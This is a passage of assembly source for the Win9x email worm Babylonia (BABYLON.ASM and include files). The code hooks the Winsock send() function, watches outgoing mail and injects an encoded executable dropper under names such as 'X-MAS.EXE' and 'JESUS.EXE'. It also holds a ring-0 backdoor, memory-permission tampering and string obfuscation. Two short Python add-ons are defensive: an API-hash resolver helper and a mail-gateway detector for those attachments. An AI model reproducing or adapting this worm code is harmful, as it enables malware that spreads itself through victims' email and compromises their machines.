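Added example, not part of the original listing: a Python helper for analysts that reproduces the CRC used by the crc macro and the @@next_byte loop above (reflected CRC-32, initial value all ones, no final inversion) and locates the resulting constants in a byte blob. The API names are the crc <...> operands from the listing; the 81 F9 encoding assumed for `cmp ecx, imm32`, the function names and the sample bytes are assumptions made for illustration.

```python
import struct
import zlib

# API names passed to the crc macro in virusmain.
API_NAMES = [
    "CreateFileA", "GetFileAttributesA", "WriteFile", "CloseHandle",
    "SetFilePointer", "LoadLibraryA", "FreeLibrary", "GetProcAddress",
    "GetSystemTime", "DeleteFileA", "ReadFile", "GetModuleHandleA", "WinExec",
]

CRC_POLY = 0xEDB88320
CRC_INIT = 0xFFFFFFFF
CMP_ECX_IMM32 = b"\x81\xf9"  # assumed encoding of `cmp ecx, imm32`


def macro_crc(name: str) -> int:
    """Bit-by-bit CRC as in the runtime loop: xor the byte into the low bits,
    shift right eight times, xor the polynomial whenever a 1 bit falls out."""
    reg = CRC_INIT
    for byte in name.encode("ascii"):
        reg ^= byte
        for _ in range(8):
            carry = reg & 1
            reg >>= 1
            if carry:
                reg ^= CRC_POLY
    return reg


def crc_via_zlib(name: str) -> int:
    """Same value from the standard library: zlib applies a final inversion
    that the listing omits, so it is undone here."""
    return zlib.crc32(name.encode("ascii")) ^ 0xFFFFFFFF


def hash_table(names=API_NAMES) -> dict:
    """Map each hash constant back to the API name it stands for."""
    return {macro_crc(name): name for name in names}


def find_api_hashes(blob: bytes, names=API_NAMES) -> list:
    """Return [(offset, api_name)] for every `cmp ecx, imm32` whose immediate
    is the hash of one of the given API names."""
    table = hash_table(names)
    hits = []
    pos = blob.find(CMP_ECX_IMM32)
    while pos != -1 and pos + 6 <= len(blob):
        (imm,) = struct.unpack_from("<I", blob, pos + 2)
        if imm in table:
            hits.append((pos, table[imm]))
        pos = blob.find(CMP_ECX_IMM32, pos + 1)
    return hits


def constructed_sample() -> bytes:
    """Constructed bytes: NOP filler, two compares against real hashes, each
    followed by a short jump, and one compare against an unrelated constant."""
    parts = [b"\x90" * 7]
    for name in ("CreateFileA", "WinExec"):
        parts.append(CMP_ECX_IMM32 + struct.pack("<I", macro_crc(name)) + b"\x74\x10")
    parts.append(CMP_ECX_IMM32 + struct.pack("<I", 0x12345678))
    return b"".join(parts)


if __name__ == "__main__":
    for value, name in sorted(hash_table().items()):
        print(f"{value:08X}  {name}")
    for offset, name in find_api_hashes(constructed_sample()):
        print(f"offset {offset:#x}: compare against hash of {name}")
```

Several hits clustered in one function of an unknown sample indicate an export-name hashing resolver of this kind; the recovered names then label the API slots during static analysis.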
hlp1_s = $
dw 4
dw (ofs _label1-ofs _label2)
_label2 = $
db "RR(`USER32.DLL',`EnumWindows',`SU')", 0
_label1 = $
dw 4
_size dw 0
p1 = $
db "EnumWindows(`"
hlp1_e = $
hlp1_sz = hlp1_e-hlp1_s
jmp esp
db "',666)", 0 ;29A
hlp2_e = $
hlp2_sz = hlp2_e-hlp1_e
check proc
call checkv
jc @@again_1
sub edx, edx
ret
@@again_1:
mov ebx, eax
@@again:
mov eax, ebx
call rnd
xor eax, edx
call checkv ;eax was validated?
jc @@again
xchg eax, edx ;edx is valid modifier?
call checkv
jc @@again
xchg edx, eax
ret
check endp
rnd proc
call @@2
dd 12345678h
@@2:
pop edx
sub [edx], 12345678h
org $-4
v2 dd 87654321h
mov edx, [edx]
xor [ebp+(ofs v2-ofs vcode)], edx ;get rnd number
ret
rnd endp
checkv proc
pusha
push 4
pop ecx
@@1:
cmp al, ' '
jbe @@error
cmp al, 0f0h
ja @@error
cmp al, '"'
jz @@error
cmp al, "'"
jz @@error
cmp al, "`"
jz @@error
cmp al, "\"
jz @@error
ror eax, 8 ;check for invalid characters
loop @@1 ;for hlp script
clc
mov cl, 12h
org $-1
@@error:
stc
popa
ret
checkv endp
open proc
call getatt
mov [ebp+(ofs attr-ofs vcode)], eax
sub ecx, ecx
call setatt
mov [ebp+(ofs fname-ofs vcode)], esi
mov eax, 0D500h
push 1h
sub ecx, ecx
mov ebx, 2022h
pop edx
call io
mov [ebp+(ofs handle-ofs vcode)], eax
ret
open endp
getsize proc
mov eax, 0D800h
__2_:
jmp __2__
getsize endp
close proc
mov eax, 0D700h
call __2_
mov ecx, 12345678h
attr equ dwo $-4
mov esi, 12345678h
fname equ dwo $-4 ;set old file attribute
close endp
setatt proc
mov eax, 4301h
__2__:
jmp __2___
setatt endp
getatt proc
mov eax, 4300h
__2___:
jmp __2
getatt endp
write proc
mov eax, 0D601h
jmp __2___
write endp
read proc
mov eax, 0D600h
__2:
mov ebx, 12345678h
handle equ dwo $-4
read endp
io proc
call delta
mov [ebp+(ofs eax_value-ofs vcode)], eax
mov eax, 00400032h ;Ring0_IO
xchg eax, [esp]
push eax
io endp
vxd proc
pop eax
call delta
mov wo [ebp+(ofs @@int-ofs vcode)], 20cdh
sub eax, ebp
add eax, -((ofs @@jmp-ofs vcode)+4)
mov [ebp+(ofs @@jmp-ofs vcode)], eax
pop dwo [ebp+(ofs @@address-ofs vcode)] ;dynamic VxDCall building
mov eax, 12345678h
eax_value equ dwo $-4
@@int:
int 20h
@@address dd 0
db 0e9h
@@jmp dd 0
vxd endp
bound_ db 'OUNDARY="'
bound_sz = $-ofs bound_
db 0
rva2raw proc
push esi
push ecx
push ebx
lea esi, [esp+section+(4*4)] ;first section
movzx ecx, wo [esp+pe_hdr+6+(4*4)]
@@section:
mov ebx, eax
sub ebx, [esi+12]
cmp [esi+8], ebx
jae @@found ;point inside section
sub esi, -40
loop @@section
sub ebx, ebx ;signal error
jmp @@error
@@found:
add ebx, [esi+20] ;convert to raw
@@error:
mov eax, ebx
pop ebx
pop ecx
pop esi
ret
rva2raw endp
check_size proc
test eax, eax
jz @@error
cmp eax, 2*1024*1024
jae @@error ;bigger than 2mb
cmp eax, 8*1024
jbe @@error ;8kb or smaller
sub edx, edx
push 17
pop ecx ;if((fsize mod 17) = 15)
div ecx ;lexo32 ;-)
sub edx, 15
db 066h, 0b8h ;mov ax, ?
@@error:
sub eax, eax
ret
check_size endp
pstart equ this byte ;wsock32.dll code...
dd 0
db 'C:\_'
driver db 8 dup (0) ;drivername
db '.---', 0
send proc
call init2
mov eax, 12345678h
_send equ dwo $-4
jmp eax ;jmp to hmem send
send endp
init2 proc
cld
pusha
call @@delta
@@delta:
pop ebp
add ebp, -(ofs @@delta-ofs pstart) ;get delta in wsock32.dll
mov ebx, ebp
lea edi, [ebx+(ofs driver-ofs pstart)]
push 8
pop ecx
@@byte:
rol ebx, 4
mov al, bl
and al, 01111b ;convert address to filename
add al, 'A'
stosb
loop @@byte
add ebx, 4
push ebx
db 0b8h
_getfattr dd 0 ;call backdoor
call eax
mov eax, 90909090h
lea edi, [ebp+((ofs send-ofs pstart))]
stosd ;clean calls to install
stosb
mov eax, [ebp] ;get ring0 interface code
test eax, eax
jz @@damaged ;cant get the interface
mov [ebp+(ofs _send-ofs pstart)], eax ;set jmps to my hmem handlers
@@damaged:
popa
ret
init2 endp
pend equ this byte
include unpack.inc
ScanVxd proc
pusha
mov edi, [ebx+0C0000018h] ;Control_Proc_0
@@page:
lea ecx, [edi+4] ;check presence for
test ecx, 00000FFFh
jz @@check ;to each new page encountered
@@mov:
inc edi
cmp [edi], esi ;B8 <esi>
jne @@page
cmp by [edi-1], 0B8h
jne @@page
mov dwo [edi], -1 ;R0_xxx <-- 0xFFFFFFFF
jmp @@page
@@check:
pusha
sub esp, 28
mov esi, esp
push 28
push esi ;esi = MEMORY_BASIC_INFO
push ecx
push 00010134h
call vxd ;VMMcall PageQuery
bt dwo [esi+10h], 3 ;mbi_state & MEM_COMMIT
lea esp, [esp+4*3+28]
popa
jc @@mov ;will not fault?
popa
ret
ScanVxd endp
IF DEBUG EQ TRUE
dropname db 'C:\GOAT.EXE', 0
ELSE
dropname db 'C:\BABYLONIA.EXE', 0
ENDIF
myname dd 0
mem_temp dd 0
mem dd 0
sent dd 0
uudropper dd 0
uusize dd 0
b64dropper dd 0
b64size dd 0
my_send proc
call init
pusha
call delta
mov esi, [esp+(8*4)+(1*4)+4] ;send() buffer
db 0b9h
socket_out dd 0 ;we're monitoring a specific socket?
jecxz @@all
cmp [esp+(8*4)+(1*4)+0], ecx ;if so, then make sure is our
je @@monitor
jmp @@done
@@all:
cmp [esi], 'ATAD' ;email is being send!
jne @@done
mov eax, [esp+(8*4)+(1*4)+0] ;monitor this socket only now
mov [ebp+(ofs socket_out-ofs vcode)], eax
sub eax, eax
mov [ebp+(ofs boundary-ofs vcode)], eax ;init MIME fieldz
mov [ebp+(ofs sent-ofs vcode)], eax
jmp @@done
@@monitor:
mov ecx, [esp+(8*4)+(1*4)+8] ;size
mov edi, esi
mov al, '.' ;search .
push ecx
@@cont_dot:
repne scasb ;not end_of_email yet
jne @@no_dot ;so, check for MIME
cmp dwo [edi-2], 0a0d2e0ah
jne @@cont_dot ;make sure is the end_of_email sign
pop ecx ;ecx=size of buffer
call uu_send
sub eax, eax ;ready to infect next email
mov [ebp+(ofs socket_out-ofs vcode)], eax
jmp @@done ;send the .
@@no_dot:
pop ecx
dec ecx ;monitor MIME emailz
dec ecx
dec ecx ;size-3, since we load DWORDs
test ecx, ecx
js @@done ;buffer smaller than 2, exit!
@@scan:
push ecx
lodsd
dec esi
dec esi
dec esi
push esi
and eax, not 20202020h ;eax=upcase of 1st 4 letterz
db 0bah
boundary dd 0
test edx, edx ;we already found the boundary?
jnz @@boundary_found
sub eax, 'NUOB'
jnz @@bogus ;maybe a boundary?
lea edi, [ebp+(ofs bound_-ofs vcode)]
@@loop_1:
cmp by [edi], ah
je @@done_1
lodsb
cmp al, 'a'
jb @@up
cmp al, 'z' ;check string
ja @@up
and al, not 20h
@@up:
inc edi
not al
cmp by [edi-1], al
je @@loop_1
@@done_1:
jne @@bogus
mov edi, [ebp+(ofs mem-ofs vcode)] ;copy MIME boundary to buffer
mov [ebp+(ofs boundary-ofs vcode)], edi
@@next_b:
lodsb
cmp al, '"'
je @@copied
stosb
jmp @@next_b
@@copied:
sub eax, eax ;now we have all we need for
stosd ;a perfect send :)
jmp @@bogus
@@boundary_found:
push esi
dec esi
dec ecx
sub eax, eax ;search for boundary
@@match:
lodsb
inc edx
cmp by [edx], ah
je @@is_boundary
cmp by [edx], al ;compare stringz
je @@match
@@is_boundary:
xchg edi, esi ;edi=end of boundary+1
pop esi
jne @@bogus ;end reached and all match?
cmp al, '-'
jne @@bogus
scasb ;found last boundary!
jne @@bogus
pop eax ;fix stack
mov [esp], edi
mov wo [edi-2], 0A0Dh ;turn to normal boundary
sub edi, [esp+(8*4)+(1*4)+4+4] ;subtract buffer address
xchg [esp+(8*4)+(1*4)+8+4], edi ;new size
mov [ebp+(ofs eax_value2-ofs vcode)], edi ;save old for return
push dwo [esp+(8*4)+(1*4)+8+4] ;size
push dwo [esp+(8*4)+(1*4)+8+4] ;buffer
call safesend
pop edi ;interception point
mov wo [edi-2], '--' ;restore user buffer
mov [ebp+(ofs eax_value2-ofs vcode)], eax
jc @@error
call uu_send
mov eax, [ebp+(ofs eax_value2-ofs vcode)] ;how much they want send
mov ebx, [esp+(8*4)+(1*4)+8] ;how much we already send
sub eax, ebx
jz @@gran_finale ;done
mov [esp+(8*4)+(1*4)+8], eax ;send rest
add [esp+(8*4)+(1*4)+4], ebx ;starting from last send byte
push dwo [esp+(8*4)+(1*4)+8] ;size
push dwo [esp+(8*4)+(1*4)+8] ;buffer
call safesend ;send the remainder of user buffer
jc @@error
@@gran_finale:
mov edi, [ebp+(ofs boundary-ofs vcode)]
mov esi, edi
@@next1:
lodsb
test al, al
jnz @@next1 ;search end
xchg edi, esi
dec edi
add al, '-'
stosb ;make last boundary
stosb
sub edi, esi ;calculate the size
push edi ;size
push esi
call safesend ;send last boundary
@@error:
popa
db 0b8h
eax_value2 dd 0 ;return no error
ret 4*4
@@bogus:
pop esi
pop ecx
dec ecx
jnz @@scan ;bahh... too far for a loop
@@done:
popa
mov eax, 12345678h
oldsend equ dwo $-4
jmp eax
my_send endp
script db 'Content-Type: application/octet-stream; name="', 1, '"', 13, 10
db 'Content-Disposition: attachment; filename="', 1, '"', 13, 10
db 'Content-Transfer-Encoding: base64', 13, 10, 13, 10
db 0
script_sz = $-ofs script
uu_send proc
pusha
sub eax, eax
cmp [ebp+(ofs sent-ofs vcode)], eax
jne @@already
mov edi, [ebp+(ofs boundary-ofs vcode)]
cmp edi, eax
je @@skip_header
add edi, 100h ;work after boundary
push edi
lea esi, [ebp+(ofs script-ofs vcode)]
@@expand:
lodsb
not al
test al, al
jz @@send_header
cmp al, 1
jnz @@name
call ninsert ;insert exe name
db 0b0h
@@name:
stosb
jmp @@expand
@@send_header:
pop esi
sub edi, esi
push edi ;size
push esi ;buffer
call safesend ;send mime header
jc @@fuxkx
mov edi, [ebp+(ofs b64size-ofs vcode)]
mov esi, [ebp+(ofs b64dropper-ofs vcode)]
jmp @@block
@@skip_header:
mov edi, [ebp+(ofs uusize-ofs vcode)]
mov esi, [ebp+(ofs uudropper-ofs vcode)]
@@block:
mov eax, 4*1024 ;block size=4kb
cmp eax, edi
jb @@low
mov eax, edi ;send the remainder
@@low:
push eax ;size
push esi ;buffer
call safesend
jc @@fuxkx
add esi, eax
sub edi, eax
jnz @@block ;blockz left?
@@fuxkx:
mov [ebp+(ofs sent-ofs vcode)], ebp
@@already:
popa
ret
uu_send endp
init proc
pusha
cld
sub eax, eax
call delta
cmp [ebp+(ofs mem-ofs vcode)], eax
jne @@inited ;we already inited our dropper?
mov eax, [ebp+(ofs mem_temp-ofs vcode)]
mov [ebp+(ofs mem-ofs vcode)], eax
test eax, eax
jz @@inited
push eax
call @@over
include dropper.inc
@@over:
call _aP_depack_asm ;unpack dropper data
add esp, -8*2
push esp
db 0b8h
_gsystime dd 0
call eax
mov bl, [esp+(1*2)] ;bl=month
add esp, 8*2
push 6
lea esi, [ebp+(ofs dates-ofs vcode)]
lea ecx, [ebp+(ofs name0-ofs vcode)]
mov [ebp+(ofs myname-ofs vcode)], ecx
pop ecx
@@next_date:
lodsw
cmp ah, bl
je @@is
cmp bl, al
jne @@nope ;this holiday isnt this month
@@is:
pusha
mov edi, [ebp+(ofs mem-ofs vcode)]
add edi, icon ;where icon should go in dropper
mov esi, edi
add esi, (ofs coelho-icon) ;first icon
mov eax, 1152
xchg eax, ecx ;eax=count ecx=size icon
dec eax
lea edx, [ebp+(ofs names-ofs vcode)]
mov edx, [edx+(eax*4)]
add edx, ebp
mov [ebp+(ofs myname-ofs vcode)], edx ;get dropper name
cdq
mul ecx ;count*size+base=new icon
add esi, eax
rep movsb ;install new icon
popa
@@nope:
loop @@next_date ;check next date
push 2
lea esi, [ebp+(ofs dropname-ofs vcode)]
pop ecx
call r3_open
jz @@fux0r
push DROPPER_SIZE
mov esi, [ebp+(ofs mem-ofs vcode)]
pop ecx
call r3_write ;write clean dropper
call r3_close
push 3
lea esi, [ebp+(ofs dropname-ofs vcode)]
pop ecx
call r3_open
jz @@fux0r1
call r3_seof ;get new dropper size
cmp eax, DROPPER_SIZE
je @@fux0r2 ;was infected?
push eax
call r3_ssof
mov edi, [ebp+(ofs mem-ofs vcode)]
mov ecx, [esp]
lea eax, [edi+ecx]
push edi
push eax
call r3_read ;read infected dropper
@@fux0r2:
call r3_close
@@fux0r1:
lea eax, [ebp+(ofs dropname-ofs vcode)]
push eax
db 0b8h
_fdelete dd 0
call eax
pop edi ;edi=uuencode buffer
mov esi, [esp] ;esi=image
mov ecx, [esp+4] ;ecx=size
call uuencode
call delta
mov [ebp+(ofs uudropper-ofs vcode)], edi
mov [ebp+(ofs uusize-ofs vcode)], ecx
pop esi ;esi=image
lea edi, [edi+ecx]
pop eax ;eax=size
call BASE64
mov [ebp+(ofs b64dropper-ofs vcode)], edi
mov [ebp+(ofs b64size-ofs vcode)], ecx
lea eax, [ebp+(ofs wsock-ofs vcode)]
push eax
db 0b8h
_getmhandle dd 0
call eax
mov edi, [ebp+(ofs _getproc-ofs vcode)] ;eax=wsock32 base
call @@112
db 'WSAGetLastError', 0
@@112:
push eax
call edi
mov [ebp+(ofs _WSAGetLastError-ofs vcode)], eax
jmp @@inited
@@fux0r:
sub eax, eax
mov [ebp+(ofs mem-ofs vcode)], eax
@@inited:
popa
ret
init endp
decript_names proc
pusha
call delta
lea edi, [ebp+(ofs name0-ofs vcode)]
push name_sz
pop ecx
mov esi, edi
@@999:
lodsb
not al ;crypt/decrypt
stosb
loop @@999
popa
ret
decript_names endp
ninsert proc
pusha
call decript_names
mov esi, [ebp+(ofs myname-ofs vcode)]
@@next:
lodsb
stosb
test al, al
jnz @@next
dec edi
mov eax, not 'EXE.'
not eax
stosd
mov [esp], edi
call decript_names
popa
ret
ninsert endp
dates equ this byte
db 06, 07 ; BABILONIA - US flag
db 12, 12 ; Christmas - Santa Claus
db 04, 04 ; Easter - egg
db 01, 01 ; Three Kings (Epiphany) - Jesus
db 10, 11 ; Halloween - pumpkin
db 03, 03 ; Easter 2 - rabbit
name0 db 'I-WATCH-U', 0 ;default name
name1 db 'BABILONIA', 0
name2 db 'X-MAS', 0
name3 db 'SURPRISE!', 0
name4 db 'JESUS', 0
name5 db 'BUHH', 0
name6 db 'CHOCOLATE', 0
name_sz = $-ofs name0
names equ this byte
dd (ofs name6-ofs vcode)
dd (ofs name5-ofs vcode)
dd (ofs name4-ofs vcode)
dd (ofs name3-ofs vcode)
dd (ofs name2-ofs vcode)
dd (ofs name1-ofs vcode)
dd 0
r3_open proc
sub eax, eax
push eax
push 22h
push ecx
push eax
push eax
push 0c0000000h
push esi
mov eax, 12345678h
_openfile equ dwo $-4
call eax ;CreateFileA
mov [ebp+(ofs r3handle-ofs vcode)], eax
inc eax
ret
r3_open endp
r3_close proc
push 12345678h
org $-4
r3handle dd 0
mov eax, 12345678h
_closehandle equ dwo $-4
call eax ;CloseHandle
ret
r3_close endp
r3_write proc
push 0
call @@1
dd 0
@@1: push ecx
push esi
push dwo [ebp+(ofs r3handle-ofs vcode)]
mov eax, 12345678h
_writefile equ dwo $-4
call eax ;WriteFile
ret
r3_write endp
r3_read proc
push 0
call @@1
dd 0
@@1: push ecx
push edi
push dwo [ebp+(ofs r3handle-ofs vcode)]
mov eax, 12345678h
_readfile equ dwo $-4
call eax ;ReadFile
ret
r3_read endp
r3_ssof proc
push 0
db 66h,0b8h
r3_seof proc
push 2
push 0
push 0
push dwo [ebp+(ofs r3handle-ofs vcode)]
mov eax, 12345678h
_seekfile equ dwo $-4
call eax ;SetFilePointer
ret
r3_seof endp
r3_ssof endp
;UUENCODE
;ESI=Data to encode
;EDI=Buffer
;ECX=Size of data
uuencode proc
cld
push edi
push esi
push ecx
mov eax, 065620A0Dh
stosw
stosd
mov eax, not ' nig'
not eax
stosd
mov eax, not ' 446'
not eax
stosd
call ninsert ;insert dropper name
mov ax, 0A0Dh
stosw
mov eax, [esp] ;eax=size
cdq
push 45
pop ebx
div ebx ;dl=rest in last line
mov ecx, eax ;ecx=number of lines
pop ebp ;ebp=size of data
pop esi ;esi=start of data
add ebp, esi ;ebp=end of data
@@line:
push ecx
mov al, "M" ;start of line
stosb
push 15
pop ecx ;read 15*3 => write 15*4
@@octet:
call getbyte
shr al, 2
call convert ;1st char
shl al, 4
and al, 00110000b
mov bh, al
call getbyte
shr al, 4
and al, 00001111b
or al, bh
call convert ;2nd char
shl al, 2
and al, 11111100b
mov bh, al
call getbyte
shr al, 6
and al, 00000011b
or al, bh
call convert ;3rd char
call convert ;4th char
loop @@octet
mov ax, 0A0Dh
stosw
pop ecx
loop @@line ;do next line
mov eax, edx
test al, al
jz @@end
add al, 20h ;do remainder
stosb
xor eax, eax
mov al, dl
xor edx, edx
xor ecx, ecx
push 3
pop ebx
div ebx
mov ecx, eax
test edx, edx
jz @@no_rest
inc cx ;octets to make
@@no_rest:
push 1 ;is last line
sub edx, edx ;with no rest
jmp @@octet
@@end:
mov eax, 0650A0D60h ;"end"
stosd
mov eax, 00A0D646Eh
stosd
shr eax, 16 ;cr+lf
stosw
pop ecx
sub edi, ecx
xchg edi, ecx
ret
uuencode endp
wsock db 'WSOCK32.DLL', 0
convert proc
and al, 00111111b
jnz @@0
add al, 40h
@@0:
add al, 20h
stosb
mov al, ah
ret
convert endp
getbyte proc
cmp esi, ebp ;end of buffer?
jne @@load
xor al, al
db 0b4h ;skip LODSB
@@load:
lodsb
mov ah, al ;backup
ret
getbyte endp
protect proc
inc ecx
add ecx, 4096 ;tnz again to z0mbie!
shr ecx, 12
test ebx, 4095
jnz @@forget
shr ebx, 12
push 0
push not (00020000h+00040000h) ;not writeable+user
push ecx
push ebx
push 00010133h ;PageModifyPermissions
call vxd
add esp, 4*4
@@forget:
ret
protect endp
safesend proc
pusha
@@retry:
mov eax, [esp+4+(8*4)]
mov ecx, [esp+8+(8*4)]
push 0
push ecx ;size
push eax ;buffer
push dwo [ebp+(ofs socket_out-ofs vcode)]
call [ebp+(ofs oldsend-ofs vcode)]
mov ecx, eax
inc ecx
jnz @@done
db 0b8h
_WSAGetLastError dd 0
call eax
sub eax, 10035 ;EWOULDBLOCK?
jz @@retry
stc ;error
db 0b1h
@@done:
clc
mov [esp+(7*4)], eax
popa
ret 2*4
safesend endp
;esi=input
;edi=output
;eax=size
BASE64 proc
cld
push edi
push 3
call @@trans
trans_table = $
db 'A','B','C','D','E','F','G','H','I','J'
db 'K','L','M','N','O','P','Q','R','S','T'
db 'U','V','W','X','Y','Z','a','b','c','d'
db 'e','f','g','h','i','j','k','l','m','n'
db 'o','p','q','r','s','t','u','v','w','x'
db 'y','z','0','1','2','3','4','5','6','7'
db '8','9','+','/'
chars dd ? ;character counter
@@trans:
pop ebx
push (ofs chars-ofs trans_table)
pop ecx
@@1:
not by [ebx+ecx-1] ;crazy, isnt? ;)
loop @@1 ;now, imagine what i can do if i wasnt stoned all time
pop ecx
cdq
mov dwo [ebx+ecx+((ofs chars-ofs trans_table)-3)], edx ;tricky ;)
div ecx
mov ecx, eax
push edx
@@loop:
lodsd
dec esi ;edx=original
mov edx, eax ;edx=work copy
call Temp
call CODE64Block3
call CODE64Block4
loop @@loop
pop ecx ;get rest
jecxz @@done
lodsd
dec ecx
jz @@rest1
movzx edx, ax ;use only 2 bytes
call Temp
call CODE64Block3
jmp @@end
@@rest1:
movzx edx, al ;use 1 byte only
call Temp
inc ecx
inc ecx
@@end:
mov al, '='
rep stosb
@@done:
mov eax, 0A0D0A0Dh
stosd
push (ofs chars-ofs trans_table)
pop ecx
@@2:
not by [ebx+ecx-1]
loop @@2
pop ecx
sub edi, ecx ;edi=buffer
xchg ecx, edi ;ecx=size
ret
BASE64 endp
Temp proc
call CODE64Block1 ;little optimizing routine
call CODE64Block2
ret
Temp endp
CODE64Block1:
mov eax, edx
shr eax, 02h
process3:
jmp process
CODE64Block2:
mov eax, edx
shl al, 04h
shr ah, 04h
process2:
or al, ah ;chained jmps
jmp process3 ;another "why make it easy?" (c) Vecna ;)
CODE64Block3:
mov eax, edx
shr eax, 08h
shl al, 02h
shr ah, 06h
jmp process2
CODE64Block4:
mov eax,edx
shr eax,10h
process:
and al,00111111b
xlatb
stosb
mov eax, dwo [ebx+(ofs chars-ofs trans_table)]
inc eax
mov dwo [ebx+(ofs chars-ofs trans_table)], eax
pusha
push 0000004Ch
pop ecx
cdq
div ecx
test edx, edx
popa
jnz @@noline
mov ax, 0A0Dh
stosw
@@noline:
ret
align 4
vend equ this byte
db 'EOV', 0
_VIRUS ends
end main
──────────────────────────────────────────────────────────────[BABYLON.ASM]───
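The listing above fixes what the injected attachment looks like on the wire: the `script` MIME header template, the `name0`..`name6` table with `.EXE` appended by `ninsert`, and the `begin 644` line written by `uuencode`. The Python below is an added example, not part of the original listing, showing how a mail gateway could match those artifacts; the function name and the sample messages are constructed for illustration.

```python
import email
import re
from email import policy

# Base names from the name0..name6 table in the listing; ninsert appends ".EXE".
DROPPER_NAMES = {
    "I-WATCH-U.EXE", "BABILONIA.EXE", "X-MAS.EXE", "SURPRISE!.EXE",
    "JESUS.EXE", "BUHH.EXE", "CHOCOLATE.EXE",
}

# The uuencode routine emits "begin 644 <name>.EXE" for mail without a MIME boundary.
UU_BEGIN = re.compile(rb"^begin 644 (\S+)\r?$", re.MULTILINE)


def find_babylonia_attachments(raw):
    """Return a list of (kind, filename) for parts matching the listing's pattern."""
    hits = []
    msg = email.message_from_bytes(raw, policy=policy.default)
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename() or ""
        cte = str(part.get("Content-Transfer-Encoding", "")).strip().lower()
        # The header template is octet-stream + base64 with name= and filename= set.
        if (name.upper() in DROPPER_NAMES
                and part.get_content_type() == "application/octet-stream"
                and cte == "base64"):
            hits.append(("mime", name))
    # Inline uuencoded attachment in a plain-text body.
    for match in UU_BEGIN.finditer(raw):
        name = match.group(1).decode("ascii", "replace")
        if name.upper() in DROPPER_NAMES:
            hits.append(("uuencode", name))
    return hits


# Constructed sample messages (no real payload data).
SAMPLE_MIME = (
    b"From: a@example.com\r\n"
    b"To: b@example.com\r\n"
    b"Subject: hi\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/mixed; boundary="XYZ"\r\n'
    b"\r\n"
    b"--XYZ\r\n"
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"hello\r\n"
    b"--XYZ\r\n"
    b'Content-Type: application/octet-stream; name="X-MAS.EXE"\r\n'
    b'Content-Disposition: attachment; filename="X-MAS.EXE"\r\n'
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n"
    b"AAAA\r\n"
    b"--XYZ--\r\n"
)

SAMPLE_UU = (
    b"From: a@example.com\r\n"
    b"To: b@example.com\r\n"
    b"Subject: hi\r\n"
    b"\r\n"
    b"hello\r\n"
    b"\r\n"
    b"begin 644 JESUS.EXE\r\n"
    b"`\r\n"
    b"end\r\n"
)

SAMPLE_CLEAN = (
    b"From: a@example.com\r\n"
    b"To: b@example.com\r\n"
    b"Subject: report\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/mixed; boundary="XYZ"\r\n'
    b"\r\n"
    b"--XYZ\r\n"
    b'Content-Type: application/pdf; name="report.pdf"\r\n'
    b'Content-Disposition: attachment; filename="report.pdf"\r\n'
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n"
    b"AAAA\r\n"
    b"--XYZ--\r\n"
)

if __name__ == "__main__":
    for label, sample in (("mime", SAMPLE_MIME), ("uu", SAMPLE_UU),
                          ("clean", SAMPLE_CLEAN)):
        print(label, find_babylonia_attachments(sample))
```

A filename match alone is a weak indicator, so a gateway would combine it with executable-attachment policy rather than rely on the seven names.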
─────────────────────────────────────────────────────────────────[HOST.INC]───
_TEXT segment dword use32 public 'CODE'
main proc
call init001
push 0
push ofs caption
push ofs msg
push 0
temp1 equ $
call virusmain
extrn MessageBoxA:PROC
call MessageBoxA
push 0
extrn ExitProcess:PROC
call ExitProcess
main endp
init001 proc
mov esi, ofs hlp1_s
mov edi, esi
mov ecx, hlp1_sz
@@1:
lodsb
not al
stosb
loop @@1
mov esi, ofs bound_
mov edi, esi
mov ecx, bound_sz
@@2:
lodsb
not al
stosb
loop @@2
mov esi, ofs script
mov edi, esi
mov ecx, script_sz
@@3:
lodsb
not al
stosb
loop @@3
mov esi, ofs name0
mov edi, esi
mov ecx, name_sz
@@4:
lodsb
not al
stosb
loop @@4
mov esi, ofs trans_table
mov edi, esi
mov ecx, (ofs chars-ofs trans_table)
@@5:
lodsb
not al
stosb
loop @@5
ret
init001 endp
_TEXT ends
_DATA segment dword use32 public 'DATA'
IF DEBUG EQ TRUE
caption db 'Vecna virus (DEBUG)', 0
ELSE
caption db 'Vecna virus', 0
ENDIF
msg db 'You just released a Win9x virus!', 0
_DATA ends
─────────────────────────────────────────────────────────────────[HOST.INC]───
──────────────────────────────────────────────────────────────[UPDATER.INC]───
;Compressed WWW Updater
;(C) Vecna
──────────────────────────────────────────────────────────────[UPDATER.INC]───
───────────────────────────────────────────────────────────────[UNPACK.INC]───
;***************************************************************
;* aPLib v0.22b - the smaller the better :) *
;* WASM & TASM assembler depacker *
;* *
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved *
;***************************************************************
_aP_depack_asm:
push ebp
mov ebp, esp
pushad
push ebp
mov esi, [ebp + 8] ; C calling convention
mov edi, [ebp + 12]
cld
mov dl, 80h
literal:
movsb
nexttag:
call getbit
jnc literal
xor ecx, ecx
call getbit
jnc codepair
xor eax, eax
call getbit
jnc shortmatch
mov al, 10h
getmorebits:
call getbit
adc al, al
jnc getmorebits
jnz domatch_with_inc
stosb
jmp short nexttag
codepair:
call getgamma_no_ecx
dec ecx
loop normalcodepair
mov eax,ebp
call getgamma
jmp short domatch
shortmatch:
lodsb
shr eax, 1
jz donedepacking
adc ecx, 2
mov ebp, eax
jmp short domatch
normalcodepair:
xchg eax, ecx
dec eax
shl eax, 8
lodsb
mov ebp, eax
call getgamma
cmp eax, 32000
jae domatch_with_2inc
cmp eax, 1280
jae domatch_with_inc
cmp eax, 7fh
ja domatch
domatch_with_2inc:
inc ecx
domatch_with_inc:
inc ecx
domatch:
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short nexttag
getbit:
add dl, dl
jnz stillbitsleft
mov dl, [esi]
inc esi
adc dl, dl
stillbitsleft:
ret
getgamma:
xor ecx, ecx
getgamma_no_ecx:
inc ecx
getgammaloop:
call getbit
adc ecx, ecx
call getbit
jc getgammaloop
ret
donedepacking:
pop ebp
sub edi, [ebp + 12]
mov [ebp - 4], edi ; return unpacked length in eax
popad
pop ebp
ret 4*2
───────────────────────────────────────────────────────────────[UNPACK.INC]───
──────────────────────────────────────────────────────────────[DROPPER.INC]───
